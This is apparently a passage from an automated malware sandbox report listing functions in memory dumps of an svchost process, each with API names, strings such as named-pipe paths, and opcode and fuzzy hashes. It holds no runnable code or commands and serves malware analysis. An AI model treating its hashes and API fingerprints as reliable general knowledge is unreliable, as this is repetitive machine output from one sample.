                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 9b580adf4509b41eb4a94773ff5a8102b7ce542dff54e5b26089740a9ad9f4c5
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: ED81F771780EC386FB54AB35AA513F922D1AB85BCCF1CA4F5E90987796EB38C845C710
                                                                                Function 000001F28C939DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: 03f29b56315fbdb1e2c5d3331ac812390df4fb0cbb8384e9f5da931591f2930e
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: 9D31A232292E82E1EE219B62A4007F523D4B748BE0F5E6675DD2E0B7D0EF39C5858310
                                                                                Function 000001F28C943DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 67fdd3f2f8992466b5831d267c2879e71773b428b435bf4b694825e767cf1671
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 69115B71250E82C6E7508B52E8547B966E0F788FE5F448264EA5E87794DB38C9148740
                                                                                Function 000001F28C933790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 9fd3b5cfc8d5e8966b9d3604d7804b60c4d561f4ad314e44b91f313a0dd5a99b
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: BB112A7A745B82C2EB149B22E4082B962A0F748BD5F4841B9DE8D07B54EF3DC545C704
                                                                                Function 000001F28C935B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 47c5c9812b7ca215d1726492dddbe4c416650bb443fc8a163cb96cfe57a725b8
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: B7D17876248F8981DB709B1AE4943BA77E0F38CBC8F151166EA8D47BA9DF38C551CB00
                                                                                Function 000001F28C932F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: b9cea8a45f337747782123fe34ee0897264f1dc14d1d7790dfee48e93a4f475a
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: FF316C36781F96C2EA55DF26E9407BA67E0FB48BC4F089174DE4847B66EF38C4A18700
                                                                                Function 000001F28C93CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: 418adbff46a5a50f38b0b253e874f0d0017697ca07832169e1c80a98fc2d9935
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: A8119D31394EC2C2FA24A73169557FA22D66B88BF4F1863B4E836477DAEF3984018600
                                                                                Function 000001F28C93199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 1a6447b746ba72951b106e25e3206bcaab34f772bbf3986eefe84e7ef40a23b2
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: 5A012D71344E8282EB64DB62A4587B963E5F788BC5F488075DE4983765DF3CC549C740
                                                                                Function 000001F28C9336C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: efc9dd88066c2b846a4813f200c66da5525754cb4ea5464905f9a4518e267477
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 690129B5291F82C2FB249B22E8183B963E0BB49BC6F0844B8CD4E07765EF3DC1488700
                                                                                Function 000001F28C938FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: f9eb285e1d34bcdb7ed76620ca0307c61ee7c6b0458fb15f7398ffc743cad808
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: A451DF32345A828AEB14CF65E848BB977E6F344BC8F1A91B4DE0653788DB75CA81C700
                                                                                Function 000001F28C931A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: efef17bbaea8c09d0e74b7a2858e95e013f6fcdb200dc7db2845cff4b926692d
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 71F04F72344EC292EB608F21F8847B967A1F748BC9F889070DA4987964DF3CC68DCB00
                                                                                Function 000001F28C933044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 148976000f075657713aaae28a70d927c58dd9bf1c24965bf8e6e3b71b7eca3c
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: CBF01275754FC682EA148B53B9141B966A6BB48FD0F08D1B4EE5A47B18DF3CC4458700
                                                                                Function 000001F28C93BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: fc48c038c58eca095657e722b28af341116bf169d467f81dd0427d00468570f8
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: 90F090B1351F8681EB208B29E8443F963A1FB89BE1F5456B9CA6A472E4DF3CC048C340
                                                                                Function 000001F28C9350D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction ID: 695498e749fc0dccb61c5851ea1446fca79afe24a4ea5175a6ebc953a781018c
                                                                                • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction Fuzzy Hash: FE02B536259BC586EB60CB65E4943BAB7E1F3C8794F145065FA8E87BA8DB7CC444CB00
                                                                                Function 000001F28C935710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction ID: af79dd3a637af7051ac8258955ba177530c52f0ebe9781b5e5262fa2f630485f
                                                                                • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction Fuzzy Hash: 9B61B736559E86C6E760CB25E4443BAB7E0F388BC4F5421A5FA8E47BA8DB7CC540CB00
                                                                                Function 000001F28C1E3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: a4a41e1020a2a8b071d84c40f44e8a003d1d22f86d765e777ed5b7e6a37d2a97
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 101191B2AD0F1391FA641528E4C13F91BC16F593F4FC88639E966C73D68BB4C841C200
                                                                                Function 000001F28C944104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 18dd3864b1be54540109cc27050939df0162b2e3d2136eb0ccd191d63ff6d6f5
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 4B117032AD0ED3A2F6685568E8563F911C16B7C3F8F18C6F4E976077E6CB38CA416201
                                                                                Function 000001F28C939650 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                                • Instruction ID: 7bb4e64f612b34c83592e40eb8d5e89f9ecd63dea6d765824e11e06b7d663cc9
                                                                                • Opcode Fuzzy Hash: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                                • Instruction Fuzzy Hash: 26116030786EC382FF549735A8843F922D5AB487E4F0D66B4D926077D9EB38C841C700
                                                                                Function 000001F28C1DF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 8ad1ea8264d7c37166e6a84d5d136f736317519dcbce977c15a2e7b39df90729
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 1B61C1766A0E4242FA699B69E5C43FE6EE1E7867C0F544539DB0B077A4DB34FA42C300
                                                                                Function 000001F28C93AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: f049bdfa4467cedf291596ae25218e3f591c75243dbf1769f2e4c86082fcfec4
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: F8614737601A858AEB209FA5D8803FD77E1F344B98F089265EE4A57B99DB38C595C700
                                                                                Function 000001F28C1DA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 25aad5721677bc98cafa89319ea8e24db697cc3f84d272024727a276e12cc536
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: B5515C32180A82CEEB64CB2695843A97FE1F355BD4F18C226DB9987BD5CF38E491C701
                                                                                Function 000001F28C93AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 9177f0bf0d9df7804a9a46984ee0add15a62b848f9b6fecfe92ace9b6ae30fc5
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 2B518F72140AC28AEB748BB59D843B977E0F354BE5F1CA265DA5947BD5CF38D860CB00
                                                                                Function 000001F28C1D8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: afc53225cc655b2fed49d42925427f3b528b099016d9c220d28cc2c64652b1ec
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 1D51AB32661A02CAFB18DB15E484BB93BE5F354BDCF518134DB1643B88EB78E841CB84
                                                                                Function 000001F28C1D83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 5bb8fd39fd54a1bbbe4b45dd7fca3805f069a24c38516c4c1dc5b630a5076e57
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: C431BC72251B42D6F714DF12E884BA97BE8F740BC8F458124EF9A43B88DB38E941C784
                                                                                Function 000001F28C942058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: c39e5784b660c4a4d2f64d18794380c2bf08d3c743fbeb2aeb89f9dd3d7ee852
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: E0D19A72B54E818AE711CBA9D4402FC7BF1F358BD8F1482A6DE5997B99DB34C506C340
                                                                                Function 000001F28C9314A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: 6a44d1e2dfff894d57fae1d393df2fad9fd7c7e601c52ccba1ddab5a2a16cdc8
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 90014476640ED1DAE704EF66E9082AAA7E0F78CFC1F088435EA4A43729EF38C151C740
                                                                                Function 000001F28C942980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: fc060a2a777751a54c3aac3ae4014f4932e9590c1f0470bfe82fe847ff4173f9
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: DD91CE72B50ED289FB64DF6594903FD3BE0B745BC8F1481A9DE0AA7A95DB34C482C700
                                                                                Function 000001F28C937960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
